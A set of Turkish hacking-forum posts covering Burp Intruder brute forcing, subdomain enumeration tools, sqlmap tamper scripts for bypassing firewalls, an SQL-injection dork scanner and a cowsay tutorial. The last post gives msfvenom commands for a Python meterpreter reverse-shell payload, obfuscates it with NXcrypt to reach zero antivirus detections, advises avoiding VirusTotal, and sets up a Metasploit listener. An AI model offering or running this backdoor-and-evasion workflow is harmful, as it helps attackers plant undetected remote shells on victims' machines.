-->

Burp Suite Intruder Attack & Admin Panel Brute Force

Selamun Aleyküm ..
Yeni bir Intruder saldırısı oluşturmanın en kolay yolu, Burp aracında ilgili temel isteği seçmektir. (Proxy geçmişi veya Hedef site haritası gibi ). İlgili istek üzerine sağ tıklayın ve içerik menüsünde TÜRKÇE adiyla Davetiye Gönder (Send To Intruder) seçeneğini kullanın.


Sub Domain Arama Yöntemleri

Sub Domain Scanner, Sub Domain Bulma

Selamun Aleyküm.. Normalde Aklımda Tüm Araçların Kullanımını Anlatan Bi Video Yada Görsel Hazırlayıp Konu Altına Eklemekti Baktım Aç Susuz Çekilmiyor Dedim Paylaş Gitsin...

YÖNTEMLER

Brute Force & Kaba kuvvet
En kolay yol. Alt alanlar olarak akliniza gelicek kelimeyi deneyin veya denettirin.

Zone Transfer & AXFR
Bölge aktarımı, yöneticilerin DNS veritabanlarını çoğaltmak için kullanabileceği bir mekanizmadır, ancak bazen DNS iyi yapılandırılmamıştır ve bu işlem herkese izin verilmiş, yapılandırılan tüm alt etki alanlarını açığa çıkarmıştır.

Reverse DNS & Ters DNS
IP adresiyle ilişkili alan adını bulmaya çalışın, İleri DNS'nin tam tersi.

Çevrimiçi DNS araçları
DNS veritabanlarını ve geçmişlerini sorgulamaya izin veren birçok web sitesi vardır.  örnek : https://www.ultratools.com/tools/dnsLookup

SSL Sertifikaları
Belirli bir alana bağlı tüm sertifikalar hakkında bilgi isteyin ve bu sertifikaların kapsadığı alt alanların bir listesini edinin. https://www.sslshopper.com/ssl-checker.html

Arama motorları
Favori arama motorunuzda belirli bir alanı arayın, sonra keşfedilen sub domainleri tek tek arayın örnek: site: example.com -www -dev  Yada: *site.com
Arama motorları
http://www.baidu.com/ 
http://www.yahoo.com/ 
http://www.google.com/ 
http://www.bing.com/ 
https://www.yandex.ru/ 
https://www.exalead.com/search/ 
http://www.dogpile.com/ 
https://www.zoomeye.org/ 
https://fofa.so/

VHost Keşfi & VHost discovery
HTTP web sitesini zorlamak için brute tarafından aynı web sunucusunda yapılandırılmış başka bir alt alan bulmaya çalışın.
https://github.com/jobertabma/virtual-host-discovery
https://github.com/codingo/VHostScan

Araçlar

Altdns: alternative names brute forcing
Amass: brute force, Google, VirusTotal, alt names
aquatone-discover: Brute force, Riddler, PassiveTotal, Threat Crowd, Google, VirusTotal, Shodan, SSL Certificates, Netcraft, HackerTarget, DNSDB
BiLE-suite: HTML parsing, alt names, reverse DNS
blacksheepwall: AXFR, brute force, reverse DNS, Censys, Yandex, Bing, Shodan, Logontube, SSL Certificates, Virus Total
Bluto: AXFR, netcraft, brute force
brutesubs: enumall, Sublist3r, Altdns
cloudflare_enum: Cloudflare DNS
CTFR: SSL Certificates
DNS-Discovery: brute force
DNS Parallel Prober: DNS resolver
dnscan: AXFR, brute force
dnsrecon: AXFR, brute force, reverse DNS, snoop caching, Google
dnssearch: brute force
domained: Sublist3r, enumall, Knockpy, SubBrute, MassDNS, recon-ng
enumall: recon-ng -> Google, Bing, Baidu, Netcraft, brute force
Fierce: AXFR, brute force, reverse DNS
Knockpy: AXFR, virustotal, brute force
MassDNS: DNS resolver
Second Order: HTML parsing
Sonar: AXFR, brute force
SubBrute: brute force
Sublist3r: Baidu, Yahoo, Google, Bing, Ask, Netcraft, DNSdumpster, VirusTotal, Threat Crowd, SSL Certificates, PassiveDNS
theHarvester: reverse DNS, brute force, Google, Bing, Dogpile, Yahoo, Baidu, Shodan, Exalead
TXDNS: alt names (typo/tld)
vhost-brute: vhost discovery
VHostScan: vhost discovery
virtual-host-discovery: vhost discovery

SQLMap Tamper Scripts

SQLMAP TAMPER SCRİPTS,


Sqlmap'de "tamper" (sabotaj) seçeneklerini anlamak.

Selamun ALeyküm ..
Aşagıdaki tabloada tamperlarin nerede kullanabiecegimizi görebeliceginiz bir tablo var.
Sabotaj verilerini kullanmanın, güvenlik duvarlarından kaçınmak ve olası bir uygulamayı filtrelemenin en büyük amacı olsa da, ne tür bir veritabanı yöneticisinin ne tür bir uygulayıcıya başvurduğunu bilmesi gerekir. 

Not: 
(*) Tüm sürümler için işe yarayabilir.
(-) uygulanmaz

TAMPERMySQLMSSQLOraclePostgreSQL
apostrophemask****
apostrophenullencode----
appendnullbyte****
base64encode4,5,5.5200510g-
between5.1---
bluecoat****
apostrophemask9.0.32000,2005-9.3
charunicodeencode4,5.0 and 5.5200510g8.3,8.4,9.0
charencode*---
commalessmid*---
concat2concatws****
equaltolike****
greatest< 5.1---
halfversionedmorekeywords5.0 and 5.5---
ifnull2ifisnull****
informationschemacomment4,5.0,5.5200510g8.3,8.4,9.0
lowercase5.0---
modsecurityversioned5.0---
modsecurityzeroversioned****
multiplespaces****
nonrecursivereplacement****
overlongutf85.1.56,5.5.112000, 2005N/A9.0
percentage4, 5.0,5.5200510g8.3,8.4,9.0
randomcase****
randomcomments****
securesphere4,5.0,5.5200510g8.3,8.4,9.0
space2comment----
space2dash4.0,5.0---
space2hash>= 5.1.13---
space2morehash-2000, 2005--
space2mssqlblank**--
space2mssqlhash****
space2plus4,5.0,5.5200510g8.3,8.4,9.0
space2randomblank-*--
sp_password****
symboliclogical****
unionalltounion****
unmagicquotes4, 5.0,5.5200510g8.3,8.4,9.0
uppercase****
varnish*---
versionedkeywords>=5.1.13---
versionedmorekeywords****
xforwardedfor****

Kali Linux SQLi Google Dork Scanner

Kali Linux SQLi Google Dork Scanner
Selamun Aleyküm ..

XGDork Google Dork Tarayıcı
Python 2.7 için ViraX @ 2018 tarafından kodlanan SQLi Google Dork Tarayıcı / Termux.Android.Lollipop5.0

Python 2.7 için URL aramayı otomatikleştiren, SQL enjeksiyonuna açık olan basit 'naif' program

[!] YASAL UYARI: Bu program ile yapacağınız yasadışı eylemlerden sorumlu değilim!,

Kurulum
git clone https://github.com/E4rr0r4/XGDork.git
cd XGDork
pip2 install requests
pip2 install termcolor
python2 XGDork.py --help


Kali Linux Cowsay & Figlet

Kali Linux Cowsay & Figlet
Selamun Aleyküm ...

GNU / Linux Terminalinizi Figlet ve Cowsay ile nasıl güzelleştireceğinizden bahsettim.
ilk olarak "apt-get install figlet " komutuyla figleti kuruyoruz
ardından ; Cowsay = "apt-get install cowsay" yazarak kurun.

Yeni bir terminal açıp root dizinindeyken (pwd) leafpad .bashrc dosyasını açınız. en alt satıra inerek;

figlet Nickiniz & Yada yazmak ıstedıgınız seyi yazınız.

Örnek: 
figlet TrazeR . org
/usr/games/cowsay -f  stegosaurus " Cyber-WarrioR.org "

cowsayı nasıl ekledık derseniz ;

cd /usr/share/cowsay/cows/ komutla cowsayın bulundugu dızıne girip ls komutuyla listeledikten sonra rasgele ascii hedef seçip dosya yolunu belirttiken sonra -f komutuyla kullanmak ıstedıgım ascii.cow'u belirttim " tırnak içinde istedigim metni yazdim"
Sonuç :
Cowsay Bazi Kullanım Örnekleri
/usr/games/cowsay -b TrazeR ===> bunu bashrc dosyanıza bu şekilde eklerseniz her terminali açtıgınızda aşağıdaki örnek resim gibi açılır.

/usr/games/cowsay -d Dead  ===> -d parametresi inegin ölü görünmesini saglar. İnek Öldü başımız saolsun

/usr/games/cowsay -g açgözlü inek modu ===> -g parametresi inegi aç gözlü moda alır. bizim inek canlandi.


 /usr/games/cowsay -p paronaya inek ===> -p parametresi ineği paronaya yapar.

/usr/games/cowsay -t yorgun inek

 /usr/games/cowsay -f dragon Cyber-WarrioR AKINCILAR ===>
–f seçeneği, kullanılacak belirli bir inek resmi dosyasını (cowfile) belirtir. Bu örnekte size bir ejderha resmi gösteriyorum. 
 Genel Olarak Kullanim: /usr/games/cowsay –f <cowfile> mesajiniz


                                                                           Video:



Kali Linux NXcrypt - Python Backdoor Framework

Selamun Aleyküm ..

msfvenom -p python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port -o /root/Masaüstü/output.py

git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt
python NXcrypt.py --help

python NXcrypt.py -f /root/Masaüstü/testingpython.py -o /root/Masaüstü/cryptpython.py 


Before: Detected by 1/38
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd 

After:
 Detected by 0/37
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd

ENCRYPTİON FİNİSHED

Stop Using Virustotal !!!! Please, Use nodistribute.com

continuation :
msfconsole 
use exploit/multi/handler/
use payload/python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port
options
ok
exploit -j